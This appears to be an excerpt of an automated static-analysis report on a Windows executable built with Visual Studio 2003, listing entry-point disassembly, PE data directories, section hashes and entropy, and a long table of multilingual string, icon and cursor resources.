                                                                                                                                            mov edx, dword ptr [esi+08h]
                                                                                                                                            mov dword ptr [00480964h], edx
                                                                                                                                            mov esi, dword ptr [esi+0Ch]
                                                                                                                                            and esi, 00007FFFh
                                                                                                                                            mov dword ptr [00480958h], esi
                                                                                                                                            cmp ecx, 02h
                                                                                                                                            je 00007FB3D08A68CEh
                                                                                                                                            or esi, 00008000h
                                                                                                                                            mov dword ptr [00480958h], esi
                                                                                                                                            shl eax, 08h
                                                                                                                                            add eax, edx
                                                                                                                                            mov dword ptr [0048095Ch], eax
                                                                                                                                            xor esi, esi
                                                                                                                                            push esi
                                                                                                                                            mov edi, dword ptr [00446338h]
                                                                                                                                            call 00007FB3D08A80DFh
                                                                                                                                            dec ebp
                                                                                                                                            pop edx
                                                                                                                                            jne 00007FB3D08A68E1h
                                                                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                                                                            add ecx, eax
                                                                                                                                            cmp dword ptr [ecx], 00004550h
                                                                                                                                            jne 00007FB3D08A68D4h
                                                                                                                                            movzx eax, word ptr [ecx+18h]
                                                                                                                                            cmp eax, 0000010Bh
                                                                                                                                            je 00007FB3D08A68E1h
                                                                                                                                            cmp eax, 0000020Bh
                                                                                                                                            je 00007FB3D08A68C7h
                                                                                                                                            mov dword ptr [ebp-1Ch], esi
                                                                                                                                            jmp 00007FB3D08A68E9h
                                                                                                                                            cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                                            jbe 00007FB3D08A68B4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000F8h], esi
                                                                                                                                            jmp 00007FB3D08A68D0h
                                                                                                                                            cmp dword ptr [ecx+74h], 0Eh
                                                                                                                                            jbe 00007FB3D08A68A4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000E8h], esi
                                                                                                                                            setne al
                                                                                                                                            mov dword ptr [ebp-1Ch], eax

                                                                                                                                            Rich Headers

                                                                                                                                            Programming Language:
                                                                                                                                            • [ASM] VS2003 (.NET) build 3077
                                                                                                                                            • [ C ] VS2003 (.NET) build 3077
                                                                                                                                            • [C++] VS2003 (.NET) build 3077
                                                                                                                                            • [RES] VS2003 (.NET) build 3077
                                                                                                                                            • [LNK] VS2003 (.NET) build 3077

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x51b740x104.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x830000x223dd8.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x466000x1c.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4ec800x48.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x460000x5f4.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x443a40x4500090bf5d6a9311d62e912522c28783a859False0.5500629812047102data6.578965194074808IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x460000xdc080xe000f035081ac4c7ee86cd6ead176dd1c9bbFalse0.3834228515625data5.2366811213048665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0x540000x2e2940x40008313c86e1a2ce269f3aa390bb3074e9bFalse0.2427978515625data2.963596560441913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x830000x223dd80x22400059bade16f1d8419fc75dee42e8a1822funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_CURSOR0x864400x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                            RT_CURSOR0x865740xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                            RT_CURSOR0x866280x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                            RT_CURSOR0x8675c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                            RT_CURSOR0x868900x134dataEnglishUnited States0.37337662337662336
                                                                                                                                            RT_CURSOR0x869c40x134dataEnglishUnited States0.37662337662337664
                                                                                                                                            RT_CURSOR0x86af80x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                            RT_CURSOR0x86c2c0x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                            RT_CURSOR0x86d600x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                            RT_CURSOR0x86e940x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                            RT_CURSOR0x86fc80x134dataEnglishUnited States0.44155844155844154
                                                                                                                                            RT_CURSOR0x870fc0x134dataEnglishUnited States0.4155844155844156
                                                                                                                                            RT_CURSOR0x872300x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                            RT_CURSOR0x873640x134dataEnglishUnited States0.2662337662337662
                                                                                                                                            RT_CURSOR0x874980x134dataEnglishUnited States0.2824675324675325
                                                                                                                                            RT_CURSOR0x875cc0x134dataEnglishUnited States0.3246753246753247
                                                                                                                                            RT_BITMAP0x877000x2e02aDevice independent bitmap graphic, 1472 x 32 x 32, image size 188418, resolution 2834 x 2834 px/m0.2016895011090004
                                                                                                                                            RT_BITMAP0xb572c0x42aDevice independent bitmap graphic, 16 x 16 x 32, image size 1026, resolution 2834 x 2834 px/m0.8236397748592871
                                                                                                                                            RT_BITMAP0xb5b580x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors0.5701219512195121
                                                                                                                                            RT_BITMAP0xb61c00xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                            RT_BITMAP0xb62780x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                            RT_ICON0xb63bc0x44028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.2371665087160047
                                                                                                                                            RT_ICON0xfa3e40x45aeaPC bitmap, Windows 3.x format, 36002 x 2 x 37, image size 285759, cbSize 285418, bits offset 540.9950668843590804
                                                                                                                                            RT_ICON0x13fed00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishUnited States0.42567567567567566
                                                                                                                                            RT_ICON0x13fff80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colorsEnglishUnited States0.260752688172043
                                                                                                                                            RT_MENU0x1402e00xe6dataEnglishUnited States0.6304347826086957
                                                                                                                                            RT_DIALOG0x1403c80x134dataEnglishUnited States0.5844155844155844
                                                                                                                                            RT_DIALOG0x1404fc0xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                            RT_STRING0x1405e40x378dataChineseTaiwan0.49436936936936937
                                                                                                                                            RT_STRING0x14095c0x896dataCzechCzech Republic0.29754322111010006
                                                                                                                                            RT_STRING0x1411f40x914dataDanishDenmark0.2706540447504303
                                                                                                                                            RT_STRING0x141b080x9ecdataGermanGermany0.27244094488188975
                                                                                                                                            RT_STRING0x1424f40xa74dataGreekGreece0.2705530642750374
                                                                                                                                            RT_STRING0x142f680x922dataFinnishFinland0.2523524379811805
                                                                                                                                            RT_STRING0x14388c0x95edataFrenchFrance0.25312760633861553
                                                                                                                                            RT_STRING0x1441ec0x68adataHebrewIsrael0.3279569892473118
                                                                                                                                            RT_STRING0x1448780x8e0dataHungarianHungary0.2953345070422535
                                                                                                                                            RT_STRING0x1451580x8e4dataItalianItaly0.2627416520210896
                                                                                                                                            RT_STRING0x145a3c0x550dataJapaneseJapan0.35294117647058826
                                                                                                                                            RT_STRING0x145f8c0x55cdataKoreanNorth Korea0.39941690962099125
                                                                                                                                            RT_STRING0x145f8c0x55cdataKoreanSouth Korea0.39941690962099125
                                                                                                                                            RT_STRING0x1464e80x8e6dataDutchNetherlands0.26733977172958734
                                                                                                                                            RT_STRING0x146dd00x82adataNorwegianNorway0.26842105263157895
                                                                                                                                            RT_STRING0x1475fc0x7eedataPolishPoland0.28374384236453204
                                                                                                                                            RT_STRING0x147dec0xa12dataPortugueseBrazil0.24204809930178434
                                                                                                                                            RT_STRING0x1488000x7badataRussianRussia0.327098078867543
                                                                                                                                            RT_STRING0x148fbc0x8fcdataSwedishSweden0.25478260869565217
                                                                                                                                            RT_STRING0x1498b80x7e8dataThaiThailand0.3102766798418972
                                                                                                                                            RT_STRING0x14a0a00x3f6dataChineseChina0.48520710059171596
                                                                                                                                            RT_STRING0x14a4980x954dataPortuguesePortugal0.26256281407035176
                                                                                                                                            RT_STRING0x14adec0x8f2data0.251528384279476
                                                                                                                                            RT_STRING0x14b6e00x8fadataEnglishCanada0.24412532637075718
                                                                                                                                            RT_STRING0x14bfdc0x21cdataChineseTaiwan0.6444444444444445
                                                                                                                                            RT_STRING0x14c1f80x3eadataCzechCzech Republic0.4431137724550898
                                                                                                                                            RT_STRING0x14c5e40x41edataDanishDenmark0.3984819734345351
                                                                                                                                            RT_STRING0x14ca040x512AmigaOS bitmap font "o", fc_YSize 25344, 17920 elements, 2nd " ", 3rd "e"GermanGermany0.362095531587057
                                                                                                                                            RT_STRING0x14cf180x482dataGreekGreece0.44280762564991333
                                                                                                                                            RT_STRING0x14d39c0x504dataFinnishFinland0.3598130841121495
                                                                                                                                            RT_STRING0x14d8a00x4b6dataFrenchFrance0.3548922056384743
                                                                                                                                            RT_STRING0x14dd580x384dataHebrewIsrael0.4588888888888889
                                                                                                                                            RT_STRING0x14e0dc0x466dataHungarianHungary0.42362344582593253
                                                                                                                                            RT_STRING0x14e5440x43cdataItalianItaly0.3966789667896679
                                                                                                                                            RT_STRING0x14e9800x22edataJapaneseJapan0.6164874551971327
                                                                                                                                            RT_STRING0x14ebb00x240dataKoreanNorth Korea0.6388888888888888
                                                                                                                                            RT_STRING0x14ebb00x240dataKoreanSouth Korea0.6388888888888888
                                                                                                                                            RT_STRING0x14edf00x4e2dataDutchNetherlands0.3424
                                                                                                                                            RT_STRING0x14f2d40x3e0AmigaOS bitmap font "v", fc_YSize 28416, 16640 elements, 2nd "i", 3rd "e"NorwegianNorway0.4112903225806452
                                                                                                                                            RT_STRING0x14f6b40x4acdataPolishPoland0.4080267558528428
                                                                                                                                            RT_STRING0x14fb600x4b0dataPortugueseBrazil0.3858333333333333
                                                                                                                                            RT_STRING0x1500100x5c8dataRussianRussia0.36824324324324326
                                                                                                                                            RT_STRING0x1505d80x41edataSwedishSweden0.3776091081593928
                                                                                                                                            RT_STRING0x1509f80x362dataThaiThailand0.46882217090069284
                                                                                                                                            RT_STRING0x150d5c0x1eadataChineseChina0.7306122448979592
                                                                                                                                            RT_STRING0x150f480x4a6dataPortuguesePortugal0.3815126050420168
                                                                                                                                            RT_STRING0x1513f00x4ecAmigaOS bitmap font "s", fc_YSize 24832, 21760 elements, 2nd "c", 3rd "q"0.3753968253968254
                                                                                                                                            RT_STRING0x1518dc0x3b0dataEnglishCanada0.4014830508474576
                                                                                                                                            RT_STRING0x151c8c0x2c8dataChineseTaiwan0.7780898876404494
                                                                                                                                            RT_STRING0x151f540x6c2dataCzechCzech Republic0.4028901734104046
                                                                                                                                            RT_STRING0x1526180x7ecdataDanishDenmark0.35552268244575935
                                                                                                                                            RT_STRING0x152e040x8c8dataGermanGermany0.33629893238434166
                                                                                                                                            RT_STRING0x1536cc0x926AmigaOS bitmap font "\301\003\255\003\307\003\277\003\275\003 ", fc_YSize 4294948611, 41987 elementsGreekGreece0.3736122971818958
                                                                                                                                            RT_STRING0x153ff40x6a8dataFinnishFinland0.3826291079812207
                                                                                                                                            RT_STRING0x15469c0x818dataFrenchFrance0.3359073359073359
                                                                                                                                            RT_STRING0x154eb40x6e0dataHebrewIsrael0.38238636363636364
                                                                                                                                            RT_STRING0x1555940x750AmigaOS bitmap font "k", fc_YSize 11520, 16640 elements, 2nd " ", 3rd "l"HungarianHungary0.38514957264957267
                                                                                                                                            RT_STRING0x155ce40x7b6dataItalianItaly0.34903748733535966
                                                                                                                                            RT_STRING0x15649c0x3e4dataJapaneseJapan0.5783132530120482
                                                                                                                                            RT_STRING0x1568800x44cdataKoreanNorth Korea0.5636363636363636
                                                                                                                                            RT_STRING0x1568800x44cdataKoreanSouth Korea0.5636363636363636
                                                                                                                                            RT_STRING0x156ccc0x820dataDutchNetherlands0.33557692307692305
                                                                                                                                            RT_STRING0x1574ec0x742AmigaOS bitmap font "j", fc_YSize 30208, 18176 elements, 2nd "r", 3rd "e"NorwegianNorway0.34607104413347684
                                                                                                                                            RT_STRING0x157c300x728dataPolishPoland0.384825327510917
                                                                                                                                            RT_STRING0x1583580x84cdataPortugueseBrazil0.3422787193973635
                                                                                                                                            RT_STRING0x158ba40x6f2dataRussianRussia0.3914510686164229
                                                                                                                                            RT_STRING0x1592980x7b6AmigaOS bitmap font "u", fc_YSize 8192, 19968 elements, 2nd "v", 3rd "e"SwedishSweden0.3601823708206687
                                                                                                                                            RT_STRING0x159a500x658dataThaiThailand0.42549261083743845
                                                                                                                                            RT_STRING0x15a0a80x2e0dataChineseChina0.751358695652174
                                                                                                                                            RT_STRING0x15a3880x770dataPortuguesePortugal0.34558823529411764
                                                                                                                                            RT_STRING0x15aaf80x7b0AmigaOS bitmap font "r", fc_YSize 25856, 16640 elements, 2nd "D", 3rd "e"0.3475609756097561
                                                                                                                                            RT_STRING0x15b2a80x7b6dataEnglishCanada0.3454913880445795
                                                                                                                                            RT_STRING0x15ba600x2d6dataChineseTaiwan0.7851239669421488
                                                                                                                                            RT_STRING0x15bd380x64adataCzechCzech Republic0.45217391304347826
                                                                                                                                            RT_STRING0x15c3840x66cdataDanishDenmark0.40450121654501214
                                                                                                                                            RT_STRING0x15c9f00x6e0Dyalog APL aplcore version 66.0GermanGermany0.4017045454545455
                                                                                                                                            RT_STRING0x15d0d00x718OpenPGP Secret KeyGreekGreece0.43061674008810574
                                                                                                                                            RT_STRING0x15d7e80x63edataFinnishFinland0.4123904881101377
                                                                                                                                            RT_STRING0x15de280x65edataFrenchFrance0.4147239263803681
                                                                                                                                            RT_STRING0x15e4880x5c4dataHebrewIsrael0.45799457994579945
                                                                                                                                            RT_STRING0x15ea4c0x5b0dataHungarianHungary0.45879120879120877
                                                                                                                                            RT_STRING0x15effc0x67cdataItalianItaly0.41566265060240964
                                                                                                                                            RT_STRING0x15f6780x36adataJapaneseJapan0.6601830663615561
                                                                                                                                            RT_STRING0x15f9e40x380dataKoreanNorth Korea0.6662946428571429
                                                                                                                                            RT_STRING0x15f9e40x380dataKoreanSouth Korea0.6662946428571429
                                                                                                                                            RT_STRING0x15fd640x6c0dataDutchNetherlands0.3894675925925926
                                                                                                                                            RT_STRING0x1604240x63adataNorwegianNorway0.397741530740276
                                                                                                                                            RT_STRING0x160a600x5d0dataPolishPoland0.4536290322580645
                                                                                                                                            RT_STRING0x1610300x66adataPortugueseBrazil0.4287454323995128
                                                                                                                                            RT_STRING0x16169c0x550dataRussianRussia0.4625
                                                                                                                                            RT_STRING0x161bec0x60edataSwedishSweden0.4096774193548387
                                                                                                                                            RT_STRING0x1621fc0x500dataThaiThailand0.5046875
                                                                                                                                            RT_STRING0x1626fc0x2c8dataChineseChina0.827247191011236
                                                                                                                                            RT_STRING0x1629c40x608OpenPGP Secret KeyPortuguesePortugal0.4216321243523316
                                                                                                                                            RT_STRING0x162fcc0x664OpenPGP Secret Key0.41503667481662593
                                                                                                                                            RT_STRING0x1636300x5daDOS executable (COM, 0x8C-variant)EnglishCanada0.4205607476635514
                                                                                                                                            RT_STRING0x163c0c0x340AmigaOS bitmap font "~v.zMQ\273\214\013N\011\217\204v", fc_YSize 8192, 2638 elements, 2nd "-\212\356v\004\223\014", 3rd "d"ChineseTaiwan0.6358173076923077
                                                                                                                                            RT_STRING0x163f4c0x6f8dataCzechCzech Republic0.36154708520179374
                                                                                                                                            RT_STRING0x1646440x74cdataDanishDenmark0.3329764453961456
                                                                                                                                            RT_STRING0x164d900x802dataGermanGermany0.3326829268292683
                                                                                                                                            RT_STRING0x1655940x908dataGreekGreece0.3672145328719723
                                                                                                                                            RT_STRING0x165e9c0x77edataFinnishFinland0.35662148070907196
                                                                                                                                            RT_STRING0x16661c0x842dataFrenchFrance0.33349101229895933
                                                                                                                                            RT_STRING0x166e600x626dataHebrewIsrael0.40088945362134687
                                                                                                                                            RT_STRING0x1674880x72adataHungarianHungary0.36150490730643403
                                                                                                                                            RT_STRING0x167bb40x7b8dataItalianItaly0.3350202429149798
                                                                                                                                            RT_STRING0x16836c0x456dataJapaneseJapan0.4846846846846847
                                                                                                                                            RT_STRING0x1687c40x45adataKoreanNorth Korea0.5197486535008977
                                                                                                                                            RT_STRING0x1687c40x45adataKoreanSouth Korea0.5197486535008977
                                                                                                                                            RT_STRING0x168c200x7cedataDutchNetherlands0.3308308308308308
                                                                                                                                            RT_STRING0x1693f00x7a6dataNorwegianNorway0.3202247191011236
                                                                                                                                            RT_STRING0x169b980x698dataPolishPoland0.36729857819905215
                                                                                                                                            RT_STRING0x16a2300x85cdataPortugueseBrazil0.31822429906542055
                                                                                                                                            RT_STRING0x16aa8c0x6b0dataRussianRussia0.3679906542056075
                                                                                                                                            RT_STRING0x16b13c0x6dedataSwedishSweden0.34186575654152446
                                                                                                                                            RT_STRING0x16b81c0x636dataThaiThailand0.3855345911949686
                                                                                                                                            RT_STRING0x16be540x346dataChineseChina0.636038186157518
                                                                                                                                            RT_STRING0x16c19c0x7dedataPortuguesePortugal0.32621648460774577
                                                                                                                                            RT_STRING0x16c97c0x73cdata0.3250539956803456
                                                                                                                                            RT_STRING0x16d0b80x74cdataEnglishCanada0.3217344753747323
                                                                                                                                            RT_STRING0x16d8040x46edataChineseTaiwan0.599647266313933
                                                                                                                                            RT_STRING0x16dc740x7b8dataCzechCzech Republic0.4185222672064777
                                                                                                                                            RT_STRING0x16e42c0x82adataDanishDenmark0.3736842105263158
                                                                                                                                            RT_STRING0x16ec580x868dataGermanGermany0.3712825278810409
                                                                                                                                            RT_STRING0x16f4c00x966dataGreekGreece0.39276807980049877
                                                                                                                                            RT_STRING0x16fe280x954dataFinnishFinland0.36139028475711893
                                                                                                                                            RT_STRING0x17077c0x94cPDP-11 demand-paged pure executable not strippedFrenchFrance0.36512605042016805
                                                                                                                                            RT_STRING0x1710c80x728dataHebrewIsrael0.4170305676855895
                                                                                                                                            RT_STRING0x1717f00x7f8dataHungarianHungary0.3877450980392157
                                                                                                                                            RT_STRING0x171fe80x86adataItalianItaly0.37418755803156917
                                                                                                                                            RT_STRING0x1728540x53edataJapaneseJapan0.5104321907600596
                                                                                                                                            RT_STRING0x172d940x5aedataKoreanNorth Korea0.5281980742778541
                                                                                                                                            RT_STRING0x172d940x5aedataKoreanSouth Korea0.5281980742778541
                                                                                                                                            RT_STRING0x1733440x878dataDutchNetherlands0.3519372693726937
                                                                                                                                            RT_STRING0x173bbc0x7a4dataNorwegianNorway0.37678936605316976
                                                                                                                                            RT_STRING0x1743600x85adataPolishPoland0.3985032740879326
                                                                                                                                            RT_STRING0x174bbc0x8eedataPortugueseBrazil0.36832895888014
                                                                                                                                            RT_STRING0x1754ac0x83adataRussianRussia0.4107312440645774
                                                                                                                                            RT_STRING0x175ce80x7fadataSwedishSweden0.38050930460333005
                                                                                                                                            RT_STRING0x1764e40x738dataThaiThailand0.42045454545454547
                                                                                                                                            RT_STRING0x176c1c0x482dataChineseChina0.6091854419410745
                                                                                                                                            RT_STRING0x1770a00x81adataPortuguesePortugal0.3799421407907425
                                                                                                                                            RT_STRING0x1778bc0x858data0.38436329588014984
                                                                                                                                            RT_STRING0x1781140x7badataEnglishCanada0.3822042467138524
                                                                                                                                            RT_STRING0x1788d00x38dataChineseTaiwan0.6428571428571429
                                                                                                                                            RT_STRING0x1789080x56dataCzechCzech Republic0.6511627906976745
                                                                                                                                            RT_STRING0x1789600x5edataDanishDenmark0.6382978723404256
                                                                                                                                            RT_STRING0x1789c00x56dataGermanGermany0.686046511627907
                                                                                                                                            RT_STRING0x178a180x5adataGreekGreece0.7222222222222222
                                                                                                                                            RT_STRING0x178a740x5edataFinnishFinland0.6382978723404256
                                                                                                                                            RT_STRING0x178ad40x5adataFrenchFrance0.6444444444444445
                                                                                                                                            RT_STRING0x178b300x46dataHebrewIsrael0.7
                                                                                                                                            RT_STRING0x178b780x52dataHungarianHungary0.6341463414634146
                                                                                                                                            RT_STRING0x178bcc0x62dataItalianItaly0.6122448979591837
                                                                                                                                            RT_STRING0x178c300x44dataJapaneseJapan0.6911764705882353
                                                                                                                                            RT_STRING0x178c740x3cdataKoreanNorth Korea0.65
                                                                                                                                            RT_STRING0x178c740x3cdataKoreanSouth Korea0.65
                                                                                                                                            RT_STRING0x178cb00x56dataDutchNetherlands0.6744186046511628
                                                                                                                                            RT_STRING0x178d080x68dataNorwegianNorway0.6826923076923077
                                                                                                                                            RT_STRING0x178d700x96dataPolishPoland0.6466666666666666
                                                                                                                                            RT_STRING0x178e080x5cdataPortugueseBrazil0.6630434782608695
                                                                                                                                            RT_STRING0x178e640x3cdataRussianRussia0.6333333333333333
                                                                                                                                            RT_STRING0x178ea00x5adataSwedishSweden0.6555555555555556
                                                                                                                                            RT_STRING0x178efc0x48dataThaiThailand0.6527777777777778
                                                                                                                                            RT_STRING0x178f440x3adataChineseChina0.6551724137931034
                                                                                                                                            RT_STRING0x178f800x52dataPortuguesePortugal0.6707317073170732
                                                                                                                                            RT_STRING0x178fd40x5cdata0.6630434782608695
                                                                                                                                            RT_STRING0x1790300x4adataEnglishCanada0.6621621621621622
                                                                                                                                            RT_STRING0x17907c0x298dataChineseTaiwan0.713855421686747
                                                                                                                                            RT_STRING0x1793140x718dataCzechCzech Republic0.3601321585903084
                                                                                                                                            RT_STRING0x179a2c0x7a8dataDanishDenmark0.3153061224489796
                                                                                                                                            RT_STRING0x17a1d40x884dataGermanGermany0.31238532110091743
                                                                                                                                            RT_STRING0x17aa580x820dataGreekGreece0.33028846153846153
                                                                                                                                            RT_STRING0x17b2780x7e0dataFinnishFinland0.3060515873015873
                                                                                                                                            RT_STRING0x17ba580x86adataFrenchFrance0.3138347260909935
                                                                                                                                            RT_STRING0x17c2c40x5e0dataHebrewIsrael0.3696808510638298
                                                                                                                                            RT_STRING0x17c8a40x718dataHungarianHungary0.3419603524229075
                                                                                                                                            RT_STRING0x17cfbc0x810dataItalianItaly0.29651162790697677
                                                                                                                                            RT_STRING0x17d7cc0x442dataJapaneseJapan0.5376146788990825
                                                                                                                                            RT_STRING0x17dc100x456dataKoreanNorth Korea0.554954954954955
                                                                                                                                            RT_STRING0x17dc100x456dataKoreanSouth Korea0.554954954954955
                                                                                                                                            RT_STRING0x17e0680x798dataDutchNetherlands0.3045267489711934
                                                                                                                                            RT_STRING0x17e8000x6e8dataNorwegianNorway0.3173076923076923
                                                                                                                                            RT_STRING0x17eee80x7b0dataPolishPoland0.3429878048780488
                                                                                                                                            RT_STRING0x17f6980x7eadataPortugueseBrazil0.31539980256663375
                                                                                                                                            RT_STRING0x17fe840x710dataRussianRussia0.3495575221238938
                                                                                                                                            RT_STRING0x1805940x734dataSwedishSweden0.3297180043383948
                                                                                                                                            RT_STRING0x180cc80x5e8dataThaiThailand0.37037037037037035
                                                                                                                                            RT_STRING0x1812b00x27cdataChineseChina0.6965408805031447
                                                                                                                                            RT_STRING0x18152c0x836dataPortuguesePortugal0.30209324452902
                                                                                                                                            RT_STRING0x181d640x8a0data0.3016304347826087
                                                                                                                                            RT_STRING0x1826040x77edataEnglishCanada0.30552659019812306
                                                                                                                                            RT_STRING0x182d840xaedataChineseTaiwan0.8908045977011494
                                                                                                                                            RT_STRING0x182e340x1feOpenPGP Public KeyCzechCzech Republic0.515686274509804
                                                                                                                                            RT_STRING0x1830340x222PGP Secret Sub-key -DanishDenmark0.43956043956043955
                                                                                                                                            RT_STRING0x1832580x278dataGermanGermany0.4272151898734177
                                                                                                                                            RT_STRING0x1834d00x244dataGreekGreece0.4793103448275862
                                                                                                                                            RT_STRING0x1837140x1dedataFinnishFinland0.4707112970711297
                                                                                                                                            RT_STRING0x1838f40x230dataFrenchFrance0.4714285714285714
                                                                                                                                            RT_STRING0x183b240x170dataHebrewIsrael0.5081521739130435
                                                                                                                                            RT_STRING0x183c940x248dataHungarianHungary0.4948630136986301
                                                                                                                                            RT_STRING0x183edc0x24cdataItalianItaly0.42857142857142855
                                                                                                                                            RT_STRING0x1841280x108dataJapaneseJapan0.8068181818181818
                                                                                                                                            RT_STRING0x1842300x122dataKoreanNorth Korea0.7344827586206897
                                                                                                                                            RT_STRING0x1842300x122dataKoreanSouth Korea0.7344827586206897
                                                                                                                                            RT_STRING0x1843540x270dataDutchNetherlands0.42788461538461536
                                                                                                                                            RT_STRING0x1845c40x1ecdataNorwegianNorway0.45934959349593496
                                                                                                                                            RT_STRING0x1847b00x208OpenPGP Public KeyPolishPoland0.5115384615384615
                                                                                                                                            RT_STRING0x1849b80x242dataPortugueseBrazil0.4429065743944637
                                                                                                                                            RT_STRING0x184bfc0x1e6dataRussianRussia0.4876543209876543
                                                                                                                                            RT_STRING0x184de40x21eOpenPGP Secret KeySwedishSweden0.44280442804428044
                                                                                                                                            RT_STRING0x1850040x1b4dataThaiThailand0.5779816513761468
                                                                                                                                            RT_STRING0x1851b80xa8dataChineseChina0.8690476190476191
                                                                                                                                            RT_STRING0x1852600x254dataPortuguesePortugal0.4513422818791946
                                                                                                                                            RT_STRING0x1854b40x216OpenPGP Secret Key0.46254681647940077
                                                                                                                                            RT_STRING0x1856cc0x21cdataEnglishCanada0.45
                                                                                                                                            RT_STRING0x1858e80x3adataChineseTaiwan0.6379310344827587
                                                                                                                                            RT_STRING0x1859240x3adataCzechCzech Republic0.6379310344827587
                                                                                                                                            RT_STRING0x1859600x3adataDanishDenmark0.6379310344827587
                                                                                                                                            RT_STRING0x18599c0x3adataGermanGermany0.6379310344827587
                                                                                                                                            RT_STRING0x1859d80x3adataGreekGreece0.6379310344827587
                                                                                                                                            RT_STRING0x185a140x3adataFinnishFinland0.6379310344827587
                                                                                                                                            RT_STRING0x185a500x3adataFrenchFrance0.6379310344827587
                                                                                                                                            RT_STRING0x185a8c0x3adataHebrewIsrael0.6379310344827587
                                                                                                                                            RT_STRING0x185ac80x3adataHungarianHungary0.6379310344827587
                                                                                                                                            RT_STRING0x185b040x3adataItalianItaly0.6379310344827587
                                                                                                                                            RT_STRING0x185b400x3adataJapaneseJapan0.6379310344827587
                                                                                                                                            RT_STRING0x185b7c0x3adataKoreanNorth Korea0.6379310344827587
                                                                                                                                            RT_STRING0x185b7c0x3adataKoreanSouth Korea0.6379310344827587
                                                                                                                                            RT_STRING0x185bb80x3adataDutchNetherlands0.6379310344827587
                                                                                                                                            RT_STRING0x185bf40x3adataNorwegianNorway0.6379310344827587
                                                                                                                                            RT_STRING0x185c300x3adataPolishPoland0.6379310344827587
                                                                                                                                            RT_STRING0x185c6c0x3adataPortugueseBrazil0.6379310344827587
                                                                                                                                            RT_STRING0x185ca80x3adataRussianRussia0.6379310344827587
                                                                                                                                            RT_STRING0x185ce40x3adataSwedishSweden0.6379310344827587
                                                                                                                                            RT_STRING0x185d200x3adataThaiThailand0.6379310344827587
                                                                                                                                            RT_STRING0x185d5c0x3adataChineseChina0.6379310344827587
                                                                                                                                            RT_STRING0x185d980x3adataPortuguesePortugal0.6379310344827587
                                                                                                                                            RT_STRING0x185dd40x3adata0.6379310344827587
                                                                                                                                            RT_STRING0x185e100x3adataEnglishCanada0.6379310344827587
                                                                                                                                            RT_STRING0x185e4c0x328dataChineseTaiwan0.34405940594059403
                                                                                                                                            RT_STRING0x1861740x328dataCzechCzech Republic0.34405940594059403
